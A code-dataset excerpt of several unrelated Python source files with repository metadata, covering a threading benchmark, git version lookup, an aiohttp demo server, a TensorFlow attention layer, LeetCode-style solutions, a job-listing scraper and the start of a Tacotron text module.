| 2021-08-16T03:09:44.203035 | 2021-08-02T07:40:00 | 2021-08-02T07:40:00 | 146,625,560 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
#!usr/bin/python
# -*- coding:utf8 -*-
import time
from threading import Thread
import sys
import threading
# Single-threaded version
def CountDown(n):
    """CPU-bound busy loop: count n down to zero; returns nothing."""
    for _ in range(n, 0, -1):
        pass
if __name__ == "__main__":
    # --- Single-threaded countdown benchmark ---
    n = 3000000
    start_time = time.perf_counter()
    CountDown(n)
    end_time = time.perf_counter()
    print("n = {},单线程版耗时{}".format(n, end_time-start_time))

    # --- Two-thread version: usually no faster, because the GIL serializes
    # CPU-bound Python bytecode across threads ---
    start_time = time.perf_counter()
    t1 = Thread(target=CountDown, args = [n//2])
    t2 = Thread(target=CountDown, args = [n//2])
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    end_time = time.perf_counter()
    print("n = {},多线程版耗时{}".format(n, end_time-start_time))

    # --- Object reference-count demo ---
    # sys.getrefcount reports one extra temporary reference held by its own
    # argument.
    for k in range(100):
        a = []
        b = a
        print(sys.getrefcount(a))

    # --- Thread-safety demo: unsynchronized increments of a shared counter ---
    # NOTE(review): `n += 1` is not atomic; the printed total could in
    # principle be < 100, although CPython's GIL usually masks the race here.
    n = 0
    def foo():
        global n
        n += 1
    threads = []
    for i in range(100):
        t = threading.Thread(target=foo)
        threads.append(t)
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print(n)
|
[
"[email protected]"
] | |
58ce61b7f582ce7941345cabdd91cbb99c06692c
|
78ee2d20722287f547c406a1cff1efc36d020ba3
|
/flare_portal/versioning.py
|
b5ae7e3705b2d24587dd22d5d6233ad8eded23e8
|
[
"MIT"
] |
permissive
|
flare-kcl/flare-portal
|
db660b4ccc39a6f125d548fc9efb21026f097563
|
a1cef9d22ba3f1bafac55bb6ee1c8223425101dd
|
refs/heads/main
| 2023-07-24T10:00:27.807734 | 2022-07-19T02:08:38 | 2022-07-19T02:08:38 | 305,943,258 | 1 | 2 |
MIT
| 2023-07-03T14:40:33 | 2020-10-21T07:30:12 |
Python
|
UTF-8
|
Python
| false | false | 2,608 |
py
|
"""Provides functions to fetch versions from Git
Copied from Raven Python
https://github.com/getsentry/raven-python/blob/d7d14f61b7fb425bcb15512f659626648c494f98/raven/utils/compat.py
"""
import os.path
class InvalidGitRepository(Exception):
    """Raised when a path does not look like a usable git repository."""
def fetch_git_sha(path: str, head: str = None) -> str:
    """Return the commit sha the repository at *path* points at.

    When *head* is omitted, ``.git/HEAD`` is consulted (following a
    ``ref: ...`` indirection); otherwise ``refs/heads/<head>`` is resolved.

    >>> fetch_git_sha(os.path.dirname(__file__))
    """
    git_dir = os.path.join(path, ".git")
    if head:
        revision_file = os.path.join(git_dir, "refs", "heads", head)
    else:
        head_path = os.path.join(git_dir, "HEAD")
        if not os.path.exists(head_path):
            raise InvalidGitRepository(
                "Cannot identify HEAD for git repository at %s" % (path,)
            )
        with open(head_path, "r") as fp:
            head = str(fp.read()).strip()
        if not head.startswith("ref: "):
            # Detached HEAD: the file already contains the sha itself.
            return head
        head = head[5:]
        revision_file = os.path.join(git_dir, *head.split("/"))

    if not os.path.exists(revision_file):
        if not os.path.exists(git_dir):
            raise InvalidGitRepository(
                "%s does not seem to be the root of a git repository" % (path,)
            )

        # A `git gc` may have consolidated loose refs into .git/packed-refs.
        # https://git-scm.com/book/en/v2/Git-Internals-Maintenance-and-Data-Recovery
        packed_file = os.path.join(git_dir, "packed-refs")
        if os.path.exists(packed_file):
            with open(packed_file) as fh:
                for line in fh:
                    line = line.rstrip()
                    # Skip blanks, comments ('#') and peeled-tag lines ('^').
                    if not line or line[:1] in ("#", "^"):
                        continue
                    try:
                        revision, ref = line.split(" ", 1)
                    except ValueError:
                        continue
                    if ref == head:
                        return str(revision)

        raise InvalidGitRepository(
            'Unable to find ref to head "%s" in repository' % (head,)
        )

    with open(revision_file) as fh:
        return str(fh.read()).strip()
def fetch_package_version(dist_name: str) -> str:
    """Return the installed version string of the distribution *dist_name*.

    >>> fetch_package_version('sentry')
    """
    try:
        # Imported lazily: loading pkg_resources can be slow.
        import pkg_resources
    except ImportError:
        # pkg_resources is unavailable on some platforms (e.g. App Engine).
        raise NotImplementedError(
            "pkg_resources is not available " "on this Python install"
        )
    return pkg_resources.get_distribution(dist_name).version
|
[
"[email protected]"
] | |
ea5d5e55d54477a28c3d0d03081e37950effcb73
|
ca17adac27ce0fc199a111db0e786bdbfd24f849
|
/02-asyncio-basic/e02-http-server.py
|
fa21cd3155f88612807884c45b0db4c6eeb30ad7
|
[] |
no_license
|
genzj/asyncio-training-course
|
862c1edb19bd3d25cb8a927fdb9942a9838c8d80
|
34e72a51f79945709fbd496391295e7cd92ec8e1
|
refs/heads/master
| 2023-08-08T05:25:01.438483 | 2023-07-17T08:53:59 | 2023-07-17T08:59:14 | 150,000,887 | 1 | 2 | null | 2023-07-25T23:36:11 | 2018-09-23T16:05:10 |
Python
|
UTF-8
|
Python
| false | false | 353 |
py
|
# -*- encoding: utf-8 -*-
from aiohttp import web

async def handle(request):
    """Greet the caller by the `name` path segment (default "Anonymous")."""
    name = request.match_info.get('name', "Anonymous")
    text = "Hello, " + name
    return web.Response(text=text)

# Route both the bare root and /<name> to the same handler.
app = web.Application()
app.add_routes([web.get('/', handle),
                web.get('/{name}', handle)])
# Serve on localhost:5000; run_app blocks until shutdown.
web.run_app(app, host='127.0.0.1', port=5000)
|
[
"[email protected]"
] | |
58f4c40eb8c52f99c0002350e82dc95a31f3baa3
|
180dc578d12fff056fce1ef8bd1ba5c227f82afc
|
/official/legacy/transformer/attention_layer.py
|
fcdce774b03f1b27cdf8350104946a44372bf458
|
[
"Apache-2.0"
] |
permissive
|
jianzhnie/models
|
6cb96c873d7d251db17afac7144c4dbb84d4f1d6
|
d3507b550a3ade40cade60a79eb5b8978b56c7ae
|
refs/heads/master
| 2023-07-12T05:08:23.314636 | 2023-06-27T07:54:20 | 2023-06-27T07:54:20 | 281,858,258 | 2 | 0 |
Apache-2.0
| 2022-03-27T12:53:44 | 2020-07-23T05:22:33 |
Python
|
UTF-8
|
Python
| false | false | 7,119 |
py
|
# Copyright 2023 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of multiheaded attention and self-attention layers."""
import math
import tensorflow as tf
from official.modeling import tf_utils
class Attention(tf.keras.layers.Layer):
  """Multi-headed attention layer."""

  def __init__(self, hidden_size, num_heads, attention_dropout):
    """Initialize Attention.

    Args:
      hidden_size: int, output dim of hidden layer.
      num_heads: int, number of heads to repeat the same attention structure.
      attention_dropout: float, dropout rate inside attention for training.
    """
    if hidden_size % num_heads:
      raise ValueError(
          "Hidden size ({}) must be divisible by the number of heads ({})."
          .format(hidden_size, num_heads))

    super(Attention, self).__init__()
    self.hidden_size = hidden_size
    self.num_heads = num_heads
    self.attention_dropout = attention_dropout

  def build(self, input_shape):
    """Builds the layer."""
    # Layers for linearly projecting the queries, keys, and values.
    size_per_head = self.hidden_size // self.num_heads

    def _glorot_initializer(fan_in, fan_out):
      # Glorot/Xavier uniform: limit = sqrt(6 / (fan_in + fan_out)).
      limit = math.sqrt(6.0 / (fan_in + fan_out))
      return tf.keras.initializers.RandomUniform(minval=-limit, maxval=limit)

    attention_initializer = _glorot_initializer(input_shape.as_list()[-1],
                                                self.hidden_size)
    # Einsum notation: B=batch, T=time, E=embedding, N=heads, H=per-head dim.
    self.query_dense_layer = tf.keras.layers.EinsumDense(
        "BTE,ENH->BTNH",
        output_shape=(None, self.num_heads, size_per_head),
        kernel_initializer=tf_utils.clone_initializer(attention_initializer),
        bias_axes=None,
        name="query")
    self.key_dense_layer = tf.keras.layers.EinsumDense(
        "BTE,ENH->BTNH",
        output_shape=(None, self.num_heads, size_per_head),
        kernel_initializer=tf_utils.clone_initializer(attention_initializer),
        bias_axes=None,
        name="key")
    self.value_dense_layer = tf.keras.layers.EinsumDense(
        "BTE,ENH->BTNH",
        output_shape=(None, self.num_heads, size_per_head),
        kernel_initializer=tf_utils.clone_initializer(attention_initializer),
        bias_axes=None,
        name="value")
    output_initializer = _glorot_initializer(self.hidden_size, self.hidden_size)
    self.output_dense_layer = tf.keras.layers.EinsumDense(
        "BTNH,NHE->BTE",
        output_shape=(None, self.hidden_size),
        kernel_initializer=output_initializer,
        bias_axes=None,
        name="output_transform")
    super(Attention, self).build(input_shape)

  def get_config(self):
    # Serialization support for Keras save/load.
    return {
        "hidden_size": self.hidden_size,
        "num_heads": self.num_heads,
        "attention_dropout": self.attention_dropout,
    }

  def call(self,
           query_input,
           source_input,
           bias,
           training,
           cache=None,
           decode_loop_step=None):
    """Apply attention mechanism to query_input and source_input.

    Args:
      query_input: A tensor with shape [batch_size, length_query, hidden_size].
      source_input: A tensor with shape [batch_size, length_source,
        hidden_size].
      bias: A tensor with shape [batch_size, 1, length_query, length_source],
        the attention bias that will be added to the result of the dot product.
      training: A bool, whether in training mode or not.
      cache: (Used during prediction) A dictionary with tensors containing
        results of previous attentions. The dictionary must have the items:
            {"k": tensor with shape [batch_size, i, heads, dim_per_head],
             "v": tensor with shape [batch_size, i, heads, dim_per_head]} where
        i is the current decoded length for non-padded decode, or max
        sequence length for padded decode.
      decode_loop_step: An integer, step number of the decoding loop. Used only
        for autoregressive inference on TPU.

    Returns:
      Attention layer output with shape [batch_size, length_query, hidden_size]
    """
    # Linearly project the query, key and value using different learned
    # projections. Splitting heads is automatically done during the linear
    # projections --> [batch_size, length, num_heads, dim_per_head].
    query = self.query_dense_layer(query_input)
    key = self.key_dense_layer(source_input)
    value = self.value_dense_layer(source_input)

    if cache is not None:
      # Combine cached keys and values with new keys and values.
      if decode_loop_step is not None:
        # Padded TPU decode: scatter the new key/value into the fixed-length
        # cache at position `decode_loop_step` via a one-hot mask.
        cache_k_shape = cache["k"].shape.as_list()
        indices = tf.reshape(
            tf.one_hot(decode_loop_step, cache_k_shape[1], dtype=key.dtype),
            [1, cache_k_shape[1], 1, 1])
        key = cache["k"] + key * indices
        cache_v_shape = cache["v"].shape.as_list()
        indices = tf.reshape(
            tf.one_hot(decode_loop_step, cache_v_shape[1], dtype=value.dtype),
            [1, cache_v_shape[1], 1, 1])
        value = cache["v"] + value * indices
      else:
        key = tf.concat([tf.cast(cache["k"], key.dtype), key], axis=1)
        value = tf.concat([tf.cast(cache["v"], value.dtype), value], axis=1)

      # Update cache
      cache["k"] = key
      cache["v"] = value

    # Scale query to prevent the dot product between query and key from growing
    # too large.
    depth = (self.hidden_size // self.num_heads)
    query *= depth**-0.5

    # Calculate dot product attention
    logits = tf.einsum("BTNH,BFNH->BNFT", key, query)
    logits += bias
    # Note that softmax internally performs math operations using float32
    # for numeric stability. When training with float16, we keep the input
    # and output in float16 for better performance.
    weights = tf.nn.softmax(logits, name="attention_weights")
    if training:
      weights = tf.nn.dropout(weights, rate=self.attention_dropout)
    attention_output = tf.einsum("BNFT,BTNH->BFNH", weights, value)

    # Run the outputs through another linear projection layer. Recombining heads
    # is automatically done --> [batch_size, length, hidden_size]
    attention_output = self.output_dense_layer(attention_output)
    return attention_output
class SelfAttention(Attention):
  """Multiheaded self-attention layer."""

  def call(self,
           query_input,
           bias,
           training,
           cache=None,
           decode_loop_step=None):
    # Self-attention: the sequence attends to itself, so `query_input` is
    # passed as both the query and the source input of the base layer.
    return super(SelfAttention, self).call(query_input, query_input, bias,
                                           training, cache, decode_loop_step)
|
[
"[email protected]"
] | |
79700ce48d4aacbecddc068d807ecf3f56d9dc9c
|
c7a1470d2f6a15265e1f884c86439dc6d98b4484
|
/LintCode/trie/0442_Implement_Trie_(Prefix_Tree).py
|
7a674f32a78d465c8b92d461ef3d7d86a6c3d96c
|
[] |
no_license
|
GuanYangCLU/AlgoTestForPython
|
5239774fb6c840f3d65c4e4290ce8125fe8c94d3
|
dddbc8115f69dec636c62c755f02905c469155e0
|
refs/heads/master
| 2022-01-19T15:03:54.835403 | 2021-12-30T02:19:37 | 2021-12-30T02:19:37 | 122,312,195 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,196 |
py
|
class TrieNode:
    """One node of the prefix tree: children keyed by character."""

    def __init__(self):
        self.children = {}
        self.isWord = False


class Trie:
    """Prefix tree supporting insertion, exact search and prefix search."""

    def __init__(self):
        self.root = TrieNode()

    def insert(self, word):
        """Add `word` to the trie, creating nodes along the way as needed."""
        node = self.root
        for ch in word:
            node = node.children.setdefault(ch, TrieNode())
        node.isWord = True

    def find(self, word):
        """Walk `word` from the root; return the final node, or None if the
        path breaks before the word is exhausted."""
        node = self.root
        for ch in word:
            node = node.children.get(ch)
            if node is None:
                return None
        return node

    def search(self, word):
        """Return True iff `word` was inserted as a complete word."""
        node = self.find(word)
        return node is not None and node.isWord

    def startsWith(self, prefix):
        """Return True iff some inserted word starts with `prefix`."""
        return self.find(prefix) is not None
|
[
"[email protected]"
] | |
462ac9a85d6bc6fb7b67357293dc32fc8f1a8490
|
0f9c9e4c60f28aa00aff8b80e1e4c142c61d24ce
|
/Python/LeetCode/102_binary_tree_level_order_traversal.py
|
9bf5ae9c253e87223e6611d5901e3a0a777bd81d
|
[] |
no_license
|
shouliang/Development
|
c56fcc69e658393c138b63b507b96c48232128d5
|
b7e3b02c50d54515e584cb18dff83109224245d0
|
refs/heads/master
| 2020-03-22T09:14:51.070228 | 2019-08-29T02:50:26 | 2019-08-29T02:50:26 | 139,825,052 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,498 |
py
|
'''
Binary tree level-order traversal
102. Binary Tree Level Order Traversal: https://leetcode.com/problems/binary-tree-level-order-traversal/
Idea: use a queue. The root enters the queue first; each time a node is popped
from the front, its left and right children are appended to the back, until
the queue is empty. This is just graph BFS - a binary tree is simply a
special kind of graph.
'''
# Definition for a binary tree node.
class TreeNode(object):
    """Binary tree node holding a value and optional left/right children."""
    def __init__(self, x):
        self.val = x      # node payload
        self.left = None  # left child (TreeNode or None)
        self.right = None # right child (TreeNode or None)
class Solution(object):
    def levelOrder(self, root):
        """
        Breadth-first traversal that groups node values level by level.

        :type root: TreeNode
        :rtype: List[List[int]]  (one inner list per depth, left to right)
        """
        if not root:
            return []
        # Perf fix: list.pop(0) shifts the whole list (O(n) per pop);
        # collections.deque gives O(1) popleft.
        from collections import deque
        result = []
        queue = deque([root])
        while queue:
            level_vals = []
            # len(queue) now == number of nodes on the current level.
            for _ in range(len(queue)):
                node = queue.popleft()
                level_vals.append(node.val)
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
            result.append(level_vals)
        return result
class Solution2(object):
    def levelOrder(self, root):
        """
        Breadth-first traversal returning node values in visit order (flat).

        :type root: TreeNode
        :rtype: List[int]
        """
        if not root:
            return []
        order = []
        pending = [root]  # FIFO queue of nodes still to visit
        while pending:
            current = pending.pop(0)
            order.append(current.val)
            # Enqueue children so they are visited after this level's siblings.
            if current.left:
                pending.append(current.left)
            if current.right:
                pending.append(current.right)
        return order
# Build the sample tree from LeetCode 102:
#       3
#      / \
#     9  20
#        / \
#       15  7
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.right.left = TreeNode(15)
root.right.right = TreeNode(7)

# Level-by-level result, then the flat BFS visit order.
print(Solution().levelOrder(root))
print(Solution2().levelOrder(root))
|
[
"[email protected]:node/hunqing.git"
] |
[email protected]:node/hunqing.git
|
3703f80c8a35f44e25ab5acfc87a2c94b2001201
|
876de904572c611b8cbad21f50877cdc812f2946
|
/Leetcode/529. 扫雷游戏.py
|
3e649e9aaf806904b938e610485bcf270d5df164
|
[
"MIT"
] |
permissive
|
QDylan/Learning-
|
66a33de0e15f26672fb63c0b393866721def27ae
|
f09e0aa3de081883b4a7ebfe4d31b5f86f24b64f
|
refs/heads/master
| 2023-02-08T02:34:26.616116 | 2020-12-25T05:02:32 | 2020-12-25T05:02:32 | 263,805,536 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,152 |
py
|
# -*- coding: utf-8 -*-
"""
@Time : 2020/8/20 10:17
@Author : QDY
@FileName: 529. 扫雷游戏.py
@Software: PyCharm
"""
"""
让我们一起来玩扫雷游戏!
给定一个代表游戏板的二维字符矩阵。'M'代表一个未挖出的地雷,'E'代表一个未挖出的空方块,
'B'代表没有相邻(上,下,左,右,和所有4个对角线)地雷的已挖出的空白方块,
数字('1' 到 '8')表示有多少地雷与这块已挖出的方块相邻,'X'则表示一个已挖出的地雷。
现在给出在所有未挖出的方块中('M'或者'E')的下一个点击位置(行和列索引),根据以下规则,返回相应位置被点击后对应的面板:
如果一个地雷('M')被挖出,游戏就结束了- 把它改为'X'。
如果一个没有相邻地雷的空方块('E')被挖出,修改它为('B'),并且所有和其相邻的未挖出方块都应该被递归地揭露。
如果一个至少与一个地雷相邻的空方块('E')被挖出,修改它为数字('1'到'8'),表示相邻地雷的数量。
如果在此次点击中,若无更多方块可被揭露,则返回面板。
示例 1:
输入:
[['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'M', 'E', 'E'],
['E', 'E', 'E', 'E', 'E'],
['E', 'E', 'E', 'E', 'E']]
Click : [3,0]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
示例 2:
输入:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'M', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
Click : [1,2]
输出:
[['B', '1', 'E', '1', 'B'],
['B', '1', 'X', '1', 'B'],
['B', '1', '1', '1', 'B'],
['B', 'B', 'B', 'B', 'B']]
解释:
注意:
输入矩阵的宽和高的范围为 [1,50]。
点击的位置只能是未被挖出的方块 ('M' 或者 'E'),这也意味着面板至少包含一个可点击的方块。
输入面板不会是游戏结束的状态(即有地雷已被挖出)。
简单起见,未提及的规则在这个问题中可被忽略。例如,当游戏结束时你不需要挖出所有地雷,考虑所有你可能赢得游戏或标记方块的情况。
"""
from collections import deque
class Solution:
    def updateBoard(self, board, click):
        """Reveal a Minesweeper cell and flood-fill per the game rules.

        board: grid of 'M' (hidden mine), 'E' (hidden empty), 'B' (revealed
               blank), digit strings '1'-'8', and 'X' (exploded mine).
        click: [row, col] of a hidden cell ('M' or 'E').
        Returns the same board object, mutated in place.
        """
        row, col = click
        if board[row][col] == 'M':
            # Clicking a mine ends the game.
            board[row][col] = 'X'
            return board
        h, w = len(board), len(board[0])

        def adjacent_mines(x, y):
            # Count mines in the 8-neighbourhood of (x, y). The (0, 0) offset
            # is harmless: the centre cell is never 'M'/'X' when counted.
            count = 0
            for dx in (-1, 0, 1):
                for dy in (-1, 0, 1):
                    nx, ny = x + dx, y + dy
                    if 0 <= nx < h and 0 <= ny < w and board[nx][ny] in ('M', 'X'):
                        count += 1
            return count

        # Iterative BFS flood fill (the original also carried an unused
        # recursive dfs helper, removed here as dead code). Cells are
        # pre-marked 'B' when enqueued so they are never enqueued twice,
        # then overwritten with their digit when dequeued if needed.
        q = deque([(row, col)])
        while q:
            x, y = q.popleft()
            mines = adjacent_mines(x, y)
            if mines:
                board[x][y] = str(mines)
            else:
                board[x][y] = 'B'
                for dx in (-1, 0, 1):
                    for dy in (-1, 0, 1):
                        nx, ny = x + dx, y + dy
                        if 0 <= nx < h and 0 <= ny < w and board[nx][ny] == 'E':
                            board[nx][ny] = 'B'
                            q.append((nx, ny))
        return board
|
[
"[email protected]"
] | |
a3a216ba5eb2add7fd1e92e28f32ec90873d2f02
|
f7d4993c3f9d840b3505e82567e673de00d91afc
|
/Code/rearrange.py
|
95a3ffe7b898c2f242d8bb2a8905229d5b2251a6
|
[] |
no_license
|
Andre-Williams22/CS-1.2-Intro-Data-Structures
|
026bb08c219ffcb7bafe43d3ea8426f821d6bc5c
|
a9effc2257a539456688c408ec4ae9e4d4d67e11
|
refs/heads/master
| 2022-12-10T00:12:31.879273 | 2019-12-12T07:10:33 | 2019-12-12T07:10:33 | 216,670,821 | 0 | 0 | null | 2022-09-23T22:30:43 | 2019-10-21T21:44:10 |
Python
|
UTF-8
|
Python
| false | false | 1,080 |
py
|
import random
import sys
# a = input('please type a word: ')
# b = input('please type a word: ')
# c = input('please type a word: ')
# d = input('please type a word: ')
# e = input('please type a word: ')
# words = []
# words.append(a)
# words.append(b)
# words.append(c)
# words.append(d)
# words.append(e)
# print ("The list before shuffling is : ", end="")
# for i in range(0, len(words)):
# print(words[i], end=" ")
# print("\r")
# random.shuffle(words)
# print(random.choice(words))
# # Printing list after shuffling
# print ("The list after shuffling is : ", end="")
# for i in range(0, len(words)):
# print (words[i], end=" ")
# print("\r")
def rearrange(words):
result = []
for i in range(len(words)):
word = random.choice(words)
result.append(word)
words.remove(word)
result = result [:-1]
return(result)
def reverse(words):
    """Return a new list with the elements of *words* in reverse order.

    Bug fix: the original printed the reversed list and implicitly returned
    None, so callers doing ``print(reverse(x))`` printed the list and then
    "None". It now returns the value and lets the caller decide what to print.
    """
    return words[::-1]
if __name__ == '__main__':
    # Words come from the command line; rearrange() shuffles and drops one.
    words = list(sys.argv[1:])
    temp = rearrange(words)
    print(temp)
    print(reverse(temp))
|
[
"[email protected]"
] | |
85d6d96659e6ab8df9179e891d05df56649e2e6d
|
a8062308fb3bf6c8952257504a50c3e97d801294
|
/problems/N431_Encode_Nary_Tree_To_Binary_Tree.py
|
29be7e11dec99008b385e8fc593469702e866409
|
[] |
no_license
|
wan-catherine/Leetcode
|
650d697a873ad23c0b64d08ad525bf9fcdb62b1b
|
238995bd23c8a6c40c6035890e94baa2473d4bbc
|
refs/heads/master
| 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,213 |
py
|
"""
For any node in the N_ary tree:
his first child to Binary Tree's left child
all other children will be this first child(left child of BT)'s right child.
"""
class Node:
    """N-ary tree node: a value plus an ordered list of children."""
    def __init__(self, val=None, children=None):
        self.val = val            # node payload
        self.children = children  # list of Node, or None
class TreeNode:
    """Binary tree node used as the encoding target."""
    def __init__(self, x):
        self.val = x      # node payload
        self.left = None  # first child of the encoded n-ary node
        self.right = None # next sibling of the encoded n-ary node
class Codec:
    """Bijective encoding between an N-ary tree and a binary tree.

    Convention (left-child / right-sibling): a node's first child becomes the
    binary node's left child, and each remaining child is chained through the
    previous sibling's right pointer.
    """

    def encode(self, root):
        """Encodes an n-ary tree to a binary tree.
        :type root: Node
        :rtype: TreeNode
        """
        if root is None:
            return None
        encoded = TreeNode(root.val)
        if root.children:
            # First child hangs on the left ...
            encoded.left = self.encode(root.children[0])
            # ... remaining children chain along the right pointers.
            tail = encoded.left
            for child in root.children[1:]:
                tail.right = self.encode(child)
                tail = tail.right
        return encoded

    def decode(self, data):
        """Decodes your binary tree to an n-ary tree.
        :type data: TreeNode
        :rtype: Node
        """
        if data is None:
            return None
        decoded = Node(data.val, [])
        sibling = data.left
        while sibling:
            decoded.children.append(self.decode(sibling))
            sibling = sibling.right
        return decoded
|
[
"[email protected]"
] | |
88d3dd854018f601e7960c53e13223c135447a52
|
9db281fbed35bb8384eeacaa81d1a32a9dcc5cca
|
/class-17/demo/monster-jobs/monster_jobs/scraper.py
|
0bb9e23c6da0da5a1287792a996e2dcec15b38c1
|
[] |
no_license
|
corey-marchand/seattle-python-401d14
|
aab3f48c82229f1958989ce8318de60b9abbe4e2
|
ae9ffebc9e5250cb5ec1760fd7764da0d3ad4e4c
|
refs/heads/master
| 2022-11-15T16:09:37.248530 | 2020-07-09T19:10:49 | 2020-07-09T19:10:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,355 |
py
|
import requests
from bs4 import BeautifulSoup

# Scrapes software-engineer job cards for Seattle from Monster's search page
# and prints a list of {title, location, company} dicts.
# NOTE(review): depends on Monster's markup at the time of writing
# (id='SearchResults', 'card-content' sections); selectors break if it changes.

# Send a request to Monster webpage
URL = 'https://www.monster.com/jobs/search/?q=software-engineer&where=Seattle__2C-WA'
response = requests.get(URL)
# print(dir(response))

# Extract content
content = response.content

# Convert to BS object
soup = BeautifulSoup(content, 'html.parser')

# Find an element
results = soup.find(id='SearchResults')
# print(results.prettify())

jobs_list = results.find_all('section', class_='card-content')
# print(len(jobs_list))

final_results = []
# Each card may omit any of the three fields; missing ones stay ''.
for job in jobs_list:
    job_dict = {'title': '', 'location':'', 'company':''}
    found_title = job.find('h2', class_='title')
    if found_title:
        title = found_title.text.strip()
        job_dict['title'] = title
    found_location = job.find('div', class_='location')
    if found_location:
        location = found_location.text.strip()
        job_dict['location'] = location
    found_company = job.find('div', class_='company')
    if found_company:
        company = found_company.text.strip()
        job_dict['company'] = company
    final_results.append(job_dict)
    # print(title)
    # print('********************************')
    # print(location)
    # print('********************************')
    # print(company)
    # print('\n ############################# \n')
print(final_results)
|
[
"[email protected]"
] | |
5397b361705d553e3e3310f32c847b29f535c167
|
60d5ea4f007d49768d250ef394003f554003e4d0
|
/python/Depth-first Search/116.Populating Next Right Pointers in Each Node.py
|
885f028bc97eeb83c99f1867befd8577674b88a1
|
[] |
no_license
|
EvanJamesMG/Leetcode
|
dd7771beb119ea1250dbb3b147a09053298cd63b
|
fa638c7fda3802e9f4e0751a2c4c084edf09a441
|
refs/heads/master
| 2021-01-10T17:11:10.896393 | 2017-12-01T16:04:44 | 2017-12-01T16:04:44 | 46,968,756 | 5 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,655 |
py
|
# coding=utf-8
'''
Given a binary tree
struct TreeLinkNode {
TreeLinkNode *left;
TreeLinkNode *right;
TreeLinkNode *next;
}
Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL.
Initially, all next pointers are set to NULL.
Note:
You may only use constant extra space.
You may assume that it is a perfect binary tree (ie, all leaves are at the same level, and every parent has two children).
For example,
Given the following perfect binary tree,
1
/ \
2 3
/ \ / \
4 5 6 7
After calling your function, the tree should look like:
1 -> NULL
/ \
2 -> 3 -> NULL
/ \ / \
4->5->6->7 -> NULL
'''
# Definition for singly-linked list.
'''
Depth-first search
'''
class TreeNode(object):
    """Binary tree node (stand-in for the problem's TreeLinkNode)."""
    def __init__(self, x):
        self.val = x      # node payload
        self.left = None  # left child
        self.right = None # right child
class ListNode(object):
    """Singly linked list node (unused by the solution below)."""
    def __init__(self, x):
        self.val = x      # node payload
        self.next = None  # next node in the list
'''
A single recursion does it: for each node, link its left and right subtrees
together via next pointers all the way down to the last level, then recurse on
the left and right children so their subtrees get linked the same way.
'''
class Solution(object):
    def connect(self, root):
        """
        Wire each node's next pointer to its right neighbour in a perfect
        binary tree, modifying the tree in place.

        :type root: TreeLinkNode
        :rtype: nothing
        """
        if not root:
            return
        # Zip the seam between the two subtrees: walk the left child's right
        # spine against the right child's left spine, linking as we go.
        left_edge, right_edge = root.left, root.right
        while left_edge and right_edge:
            left_edge.next = right_edge
            left_edge = left_edge.right
            right_edge = right_edge.left
        self.connect(root.left)
        self.connect(root.right)
|
[
"[email protected]"
] | |
83aafba4187bb26dfef831f2cb3ecf91c7677d01
|
04dddbf04893913b0b24c6c02ebd2672b774a616
|
/다이나믹 프로그래밍/11052 카드 구매하기.py
|
565e7ec0c89ae6471533ed01d0209c88d36b7020
|
[] |
no_license
|
hatssww/BOJ
|
ca16345dbe24641e1ca5adee136a858a64a080b0
|
bd7363d5c84de281de9b34667e9c0b76a904cffc
|
refs/heads/main
| 2023-05-24T22:23:35.127397 | 2021-06-08T23:36:40 | 2021-06-08T23:36:40 | 370,254,375 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 264 |
py
|
import sys

# BOJ 11052 (card packs): p[j] is the price of the pack holding j cards.
n = int(sys.stdin.readline())
p = [0] + list(map(int, sys.stdin.readline().split()))

# d[i] = maximum total price achievable for exactly i cards:
#   d[i] = max over j in 1..i of d[i-j] + p[j]  (last pack bought has j cards)
d = [0] * (n + 1)
d[1] = p[1]
for i in range(2, n + 1):
    for j in range(1, i + 1):
        if d[i] < d[i - j] + p[j]:
            d[i] = d[i - j] + p[j]
print(d[n])
|
[
"[email protected]"
] | |
810c374d5845fa02cb9141659fad67f933c09195
|
3abe7b4d572ae81a8222996821569bf3a684ec14
|
/text/__init__.py
|
e9461d87f13166dac13aea90ab80aead3a0ef212
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
creotiv/RussianTTS-Tacotron2
|
6c8defdd5a9cafdd46b71f8006162c4bab586d0f
|
8ac15eea9450d141cb84d4d1a96b600f43d206c9
|
refs/heads/master
| 2023-06-01T09:43:12.209652 | 2021-06-10T12:54:24 | 2021-06-10T12:54:24 | 334,964,314 | 13 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,385 |
py
|
""" from https://github.com/keithito/tacotron """
import re
from text import cleaners
from text.symbols import symbols, ctc_symbols
# Mappings from symbol to numeric ID and vice versa:
symbol_to_id = {s: i for i, s in enumerate(symbols)}    # symbol -> integer ID
_id_to_symbol = {i: s for i, s in enumerate(symbols)}   # integer ID -> symbol
_ctc_symbole_to_id = {s: i for i, s in enumerate(ctc_symbols)}  # CTC-subset symbol -> ID (sic: "symbole")
# Regular expression matching text enclosed in curly braces:
